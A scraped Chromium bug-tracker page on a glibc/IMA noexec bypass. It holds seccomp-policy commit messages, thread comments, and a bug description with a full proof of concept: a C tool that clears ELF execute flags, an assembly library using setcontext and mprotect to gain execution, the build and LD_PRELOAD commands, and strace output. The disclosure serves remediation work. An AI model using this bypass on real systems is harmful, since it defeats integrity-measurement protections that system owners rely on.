Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-amd64.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-arm.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-arm64.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arcvm-adbd-amd64.policy
commit eb0387e68a6a10302ab94b6a1171cefbc0943d2d
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 30 20:36:09 2021
adbd: Add fstatfs(64) to seccomp filters
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kmod at present, which we _suspect_ some of those crashes
may be due to missing fstatfs in adbd policies.
Crashes found via crash.corp:
BUG=chromium:1182687
TEST=N/A (we can't repo the issue seen in prod locally or in CQ)
Change-Id: Ie1b9daad72a9b88d564d8f750a9f774ffd8ba6e3
Reviewed-on:
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Yusuke Sato <yusukes@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]
[modify]
[modify]
[modify]
be...@google.com
Hi ajordanr@, a few commits have landed recently. Is the issue fixed now and can we close this bug?
aj...@google.com
This should be fixed--we're not seeing any more seccomp issues and the underlying issue does not manifest further. We can close this bug.
We have one tracking bug for RunOCI in buganizer (https://b.corp.google.com/issues/194923131 ) to track some cleanup.
I'd be happy to get external verification that this is fully closed. My tests for this were local (besides the RunOCI test which this patch broke legitimately).
We have one tracking bug for RunOCI in buganizer (
I'd be happy to get external verification that this is fully closed. My tests for this were local (besides the RunOCI test which this patch broke legitimately).
[Deleted User] <[Deleted User]>
[Empty comment from Monorail migration]
am...@chromium.org
[Empty comment from Monorail migration]
jo...@chromium.org
I don't think we can feasibly merge this to 93.
ll...@google.com
Updating toolchain components (like gblic in this case) in branches is very difficult
I don't think this needs updating the branch.
@jordanr: there is still the issue of getting acceptance/rejection from the glibc upstream community.
Do we have a bug for tracking that?
I don't think this needs updating the branch.
@jordanr: there is still the issue of getting acceptance/rejection from the glibc upstream community.
Do we have a bug for tracking that?
rz...@google.com
[Empty comment from Monorail migration]
ja...@google.com
[Empty comment from Monorail migration]
[Deleted User] <[Deleted User]>
This bug has been closed for more than 14 weeks. Removing security view restrictions.
For more details visithttps://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
For more details visit
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform/touch_updater/+/3d54d863f2e8c003d198c01dad1d4453d3d867a9
commit 3d54d863f2e8c003d198c01dad1d4453d3d867a9
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash:http://shortn/_eLdGeNd8sp
kmod:http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Cq-Depend: chromium:3573728
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3116692
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
(cherry picked from commit 97e19f6c183413affb7dbef8b4265234b78f6365)
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3573729
Reviewed-by: Bob Moragues <moragues@chromium.org>
Tested-by: Davis Hung <davis.hung@quanta.corp-partner.google.com>
Commit-Queue: Knox Chiou <knoxchiou@chromium.org>
Tested-by: Knox Chiou <knoxchiou@chromium.org>
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/rmi4update.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wdt_util.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/sisupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/pixtpfwup.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/gdixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/rmi4update.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/gdixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/emrightupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/elani2chid.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/etphidiap/policies/amd64/etphidiap.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.read.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/mfsupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/eps2pstiap.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/elani2chid.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/rmi4update.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/pixtpfwup.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/etphidiap/policies/amd64/etphidiap.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/gdixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/mfsupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/elani2chid.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/zinitixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wdt_util.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wdt_util.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/gdixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/elani2chid.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wdt_util.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/eps2pstiap.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/zinitixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/sisupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/pixtpfwup.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/pixtpfwup.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/emrightupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/rmi4update.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/rmi4update.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/rmi4update.update.policy
commit 3d54d863f2e8c003d198c01dad1d4453d3d867a9
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash:
kmod:
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Cq-Depend: chromium:3573728
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on:
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
(cherry picked from commit 97e19f6c183413affb7dbef8b4265234b78f6365)
Reviewed-on:
Reviewed-by: Bob Moragues <moragues@chromium.org>
Tested-by: Davis Hung <davis.hung@quanta.corp-partner.google.com>
Commit-Queue: Knox Chiou <knoxchiou@chromium.org>
Tested-by: Knox Chiou <knoxchiou@chromium.org>
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
is...@google.com
This issue was migrated from crbug.com/chromium/1182687?no_tracker_redirect=1
[Monorail components added to Component Tags custom field.]
[Monorail components added to Component Tags custom field.]
Description
This is marked as Severity-High because a noexec bypass would be exactly that, but currently labelled a P2 because we haven't fully confirmed that it works on CrOS.
"""
At least in the Debian Stretch VM I'm testing with, even dynamic ELF
libraries can be crafted such that they can be loaded without tripping
the security hook that listens for mmap() with PROT_EXEC because
glibc's dynamic loader allows you to load a library that has no
executable segments; a demo for this follows below. It feels like this
probably violates IMA's design goals, but I'm not sure.
=============================
user@debian:~/ima_stuff$ cat make_segments_rw.c
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <elf.h>
#include <sys/mman.h>
#include <sys/stat.h>
int main(int argc, char **argv) {
int fd = open(argv[1], O_RDWR);
if (fd == -1) err(1, "open");
struct stat st;
if (fstat(fd, &st)) err(1, "stat");
unsigned char *mapping = mmap(NULL, st.st_size,
PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED) err(1, "mmap");
Elf64_Ehdr *ehdr = (void*)mapping;
Elf64_Phdr *phdrs = (void*)(mapping + ehdr->e_phoff);
for (int i=0; i<ehdr->e_phnum; i++) {
phdrs[i].p_flags &= ~PF_X;
phdrs[i].p_flags |= PF_W;
}
return 0;
}
user@debian:~/ima_stuff$ cat test.s
.text
.section .text.startup,"aw",@progbits
.globl foobar
.align 4096
foobar:
/* alignment for xmm stuff in libc */
sub $8, %rsp
call getpid
mov %rax, %rsi
leaq message(%rip), %rdi
call printf
movq stdout_indir(%rip), %rdi
movq (%rdi), %rdi
call fflush
xor %edi, %edi
call _exit
.section .init_array,"aw"
.align 8
.quad rmdir+0x774
.section .fini_array,"aw"
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad ucontext_data /* goes into rdi */
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad setcontext+0x35 /* call target */
.data
ucontext_data:
/* 0x00 */
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
/* 0x40 */
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, foobar
.quad 0x1000, 0xdeadbeefdeadbeef
/* 0x80 */
.quad 0xdeadbeefdeadbeef, 0x7
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad stack_end, mprotect
/* my stack */
.fill 0x10000, 1, 0x42
stack_end:
.quad foobar
message:
.string "hello world from PID %d\n"
stdout_indir:
.quad stdout
user@debian:~/ima_stuff$ gcc -o make_segments_rw make_segments_rw.c
user@debian:~/ima_stuff$ as -o test.o test.s
test.s: Assembler messages:
test.s:2: Warning: setting incorrect section attributes for .text.startup
user@debian:~/ima_stuff$ ld -shared -znorelro -o test.so test.o
user@debian:~/ima_stuff$ ./make_segments_rw test.so
user@debian:~/ima_stuff$ LD_PRELOAD=./test.so /bin/echo
hello world from PID 1053
user@debian:~/ima_stuff$ sudo tail
/sys/kernel/security/ima/runtime_measurements_count
1182
user@debian:~/ima_stuff$ sudo tail /sys/kernel/security/ima/runtime_measurements
tail: cannot open '/sys/kernel/security/ima/runtime_measurements' for
reading: No such file or directory
user@debian:~/ima_stuff$ sudo tail
/sys/kernel/security/ima/ascii_runtime_measurements
10 2435d24127ce5bcfbe776589ac86bc85530da07d ima-ng
sha256:ae35ddf5dbbef6ea31e8b87326001d12a6b4ec479bb8195b874d733d69ed1a4d
/usr/bin/x86_64-linux-gnu-gcc-6
10 f3ed20073a77fbc020d2807ce12ffc4cdbced976 ima-ng
sha256:65af5a9ea7ce00be9b921d4b13f5224c2369451eb918d4fa7721442283545957
/usr/bin/x86_64-linux-gnu-g++-6
10 25f0128e89a730a6f1cdd42d8de71d3db2625c9e ima-ng
sha256:d5d7e609b95939d0ae9f75a953d5cda4f1d8b9e4c1db98aeee7f792028bf026e
/usr/bin/x86_64-linux-gnu-as
10 51cf269a0008ab8173c7a696bee11be86a0bbd45 ima-ng
sha256:2d10a4e221ef8454b635f1ec646e6f4ff7f3db8e2e59b489c642758b2624a659
/usr/lib/x86_64-linux-gnu/
10 b5c1db60c50722e1af84b83b34c0adb04b98d040 ima-ng
sha256:d3eef29b5b5bfc12999c5dbcc91029302477b70c7599aeb6b564140a336ab00b
/usr/lib/x86_64-linux-gnu/
10 6364d50cdac1733b7fd5dcfd9df124d1e4362a12 ima-ng
sha256:30c26e4b3cbd0677b2a23d09a72989002af138be57d301ed529c91b88427098f
/usr/lib/gcc/x86_64-linux-gnu/6/collect2
10 2a8c7ddacee57967e8a00ee1a522b552e29f559f ima-ng
sha256:a7b6287a8095701713e9ee7a886cae1f1ceefd0ce9c45dcc38719af563200964
/usr/bin/x86_64-linux-gnu-ld.bfd
10 e55a9c15349e2271cbdfe2f4fe36cd5b4070d3d0 ima-ng
sha256:b31674ad141a40eb2603f20400cc0dea4ee32ecf87771df3d039f16aae60ee26
/usr/lib/gcc/x86_64-linux-gnu/6/liblto_plugin.so.0.0.0
10 617aab630be74cd5bb7d830a727fd29cda361743 ima-ng
sha256:40fbf6acd3182d7a1ad158cd4de48da704bfe84f468d7b58dd557db93fe8a34c
/usr/bin/vim.basic
10 2c1fe398ecc0a8db6651621715d60a7e1b1958dc ima-ng
sha256:8523b422a01af773eff76b981c763cf0c739ea3030e592bb4d4f7854e295c418
/home/user/ima_stuff/make_segments_rw
user@debian:~/ima_stuff$
=============================
When looking at the syscalls the process is making, you can see that
it indeed never calls mmap() with PROT_EXEC on the library (my
shellcode does mprotect() the code to be executable, but IMA doesn't
use the mprotect security hook):
=============================
user@debian:~/ima_stuff$ strace -E LD_PRELOAD=./test.so /bin/echo
execve("/bin/echo", ["/bin/echo"], [/* 44 vars */]) = 0
brk(NULL) = 0x5642c52bc000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0x7fb83e817000
open("./test.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"...,
832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=72232, ...}) = 0
getcwd("/home/user/ima_stuff", 128) = 21
mmap(NULL, 2167449, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_DENYWRITE,
3, 0) = 0x7fb83e3e5000
mprotect(0x7fb83e3e7000, 2093056, PROT_NONE) = 0
mmap(0x7fb83e5e6000, 69632, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1000) = 0x7fb83e5e6000
mprotect(0x7ffea1b1f000, 4096,
PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
close(3) = 0
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=103509, ...}) = 0
mmap(NULL, 103509, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fb83e7fd000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"...,
832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3,
0) = 0x7fb83e046000
mprotect(0x7fb83e1db000, 2097152, PROT_NONE) = 0
mmap(0x7fb83e3db000, 24576, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fb83e3db000
mmap(0x7fb83e3e1000, 14752, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fb83e3e1000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0x7fb83e7fb000
arch_prctl(ARCH_SET_FS, 0x7fb83e7fb700) = 0
mprotect(0x7fb83e3db000, 16384, PROT_READ) = 0
mprotect(0x5642c3eed000, 4096, PROT_READ) = 0
mprotect(0x7fb83e81a000, 4096, PROT_READ) = 0
munmap(0x7fb83e7fd000, 103509) = 0
mprotect(0x7fb83e3e6000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
getpid() = 1084
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 4), ...}) = 0
brk(NULL) = 0x5642c52bc000
brk(0x5642c52dd000) = 0x5642c52dd000
write(1, "hello world from PID 1084\n", 26hello world from PID 1084
) = 26
exit_group(0) = ?
+++ exited with 0 +++
=============================
"""